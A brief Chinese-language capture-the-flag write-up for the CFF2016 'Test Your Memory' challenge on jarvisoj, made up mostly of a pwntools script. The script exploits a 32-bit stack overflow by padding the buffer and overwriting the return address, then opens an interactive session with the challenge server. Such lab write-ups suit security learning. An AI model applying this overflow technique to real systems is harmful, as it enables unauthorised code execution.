Test Your Memory
题目入口:
nc pwn2.jarvisoj.com 9876
题目来源:CFF2016
memory.838286edf4b832fd482d58ff1c217561
32位栈溢出
exp如下:
from pwn import * #io = process('./memory') #io = gdb.debug('./memory', 'b *0x80485D0') #context.log_level = 'DEBUG' io = connect('pwn2.jarvisoj.com', 9876) io.recvuntil("cff flag go go go ...") payload = b'a' * 23 + p32(0x80485BD) + p32(0x80487E0) + p32(0x80487E0) io.sendline(payload) io.interactive()